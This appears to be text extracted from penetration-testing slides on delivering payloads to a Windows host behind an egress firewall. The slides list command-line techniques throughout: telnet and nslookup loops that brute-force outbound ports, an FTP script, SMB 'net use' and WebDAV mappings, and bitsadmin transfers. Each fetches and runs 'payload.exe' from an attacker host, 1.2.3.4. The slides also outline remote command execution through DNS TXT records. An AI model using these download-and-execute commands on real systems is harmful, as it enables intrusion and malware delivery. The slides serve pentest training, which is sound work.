9. [Egress Firewall][Windows XP & 2003]
- Bruteforce all TCP ports on Pentest with telnet
FOR /L %i IN (1,1,65535) DO (cmd /c "start /b telnet 1.2.3.4 %i"
10. [Egress Firewall][Windows XP & 2003]
- Bruteforce all TCP ports on Pentest with telnet
- Bruteforce all UDP ports on Pentest with nslookup
FOR /L %i IN (1,1,4096) DO (cmd /c "start /b telnet 1.2.3.4 %i")
FOR /L %i IN (1,1,4096) DO (cmd /c "start /b nslookup -port=%i ya.ru 1.2.3.4")
12. [Egress Firewall][Windows XP & 2003]
Influence:
~ 400 telnet.exe processes
~ 700 MB RAM is used
~ 30 min TCP scan
~ 30 min UDP scan
13. dism /online /enable-feature /featurename:TelnetClient
[Egress TCP][Windows Vista and Later]
- Bruteforce all TCP ports on Pentest with PowerShell
- Telnet client is Disabled by design :( but if we can it run with
elevated permissions …
21. [FTP]
Any TCP open
- Script file must exist
- FTP client built in all Windows versions
22. [FTP]
Create script file payload.txt:
open 1.2.3.4 3128
quote pasv
binary
get payload.exe c:payload.exe
bye service start pure-ftpd
Any TCP open
ftp –i–s:payload.txt
23. [TFTP]
69/UDP open
dism /online /enable-feature /featurename:TFTP
- Use only UDP protocol
- TFTP client is Disabled by design :( but if we can run it with
elevated permissions …
25. [Samba]
445/TCP open
+ No writable directory
+ No command output
- Proxy isn‟t supported
- 445/tcp only
26. [Samba]
net use X: 1.2.3.4
445/TCP open
start x:payload.exe
service smbd start
27. [JScript/VBScript]
Any TCP open
― Encode EXE to script
― Use protocols: SMTP, FTP, LDAP …
― Script file must exist: .js, .jse, .vbs, .vse
― JScript vs VBScript
― cscript vs wscript
39. [NSLOOKUP]
no tcp/udp open
― Get DNS Records:
• IP -> Domain name (PTR)
• Domain name -> IP (A and AAAA)
• Get TXT record (TXT)
40. [NSLOOKUP]
TARGET
IP: 192.168.1.10
Firewall/NAT
Internal IP: 192.168.1.1
External IP: 5.5.5.5
PENTEST
IP: 1.2.3.4
Remote Command Execution
Name server:
pentest.comInternal primary DNS
Response
no tcp/udp open
Get all TXT records from
rce.pentest.com
48. [WebDAV] [Samba]
Any TCP open
+ No writable directory
+ No command output
+ Proxy
+ Any tcp open
+ SSL
+ No writable directory
+ No command output
- Proxy doesn‟t supported
- 445/tcp only
vs.
Any TCP open
49. [WebDAV][Windows XP SP3 or KB892211]
Any TCP open
net use X:
http(s)://1.2.3.4/webdav
1.2.3.4webdav
1.2.3.4@SSLwebdav
1.2.3.4@SSL@5443webdav
1.2.3.4@53webdav
Apache WebDAV module
Any TCP open
50. [PowerShell]
Any TCP open
― C# code
― Any application level protocol
― Encoded commands
― Simple and it‟s work!
Any TCP open
52. [BITSADMIN][Windows 2003 SP1 and later]
Any TCP open
bitsadmin /transfer whatever http://1.2.3.4:80/payload.exe
c:payload.exe
service apache2 start
Any TCP open
53. [BITSADMIN][Windows 2003 SP1 and later]
Any TCP open
bitsadmin /CREATE /DOWNLOAD jobname
bitsadmin /ADDFILE jobname http://1.2.3.4/payload1.exe p1.exe
bitsadmin /ADDFILE jobname http://1.2.3.4/payload2.exe p2.exe
…
bitsadmin /RESUME jobname
bitsadmin /COMPLETE jobname
Any TCP open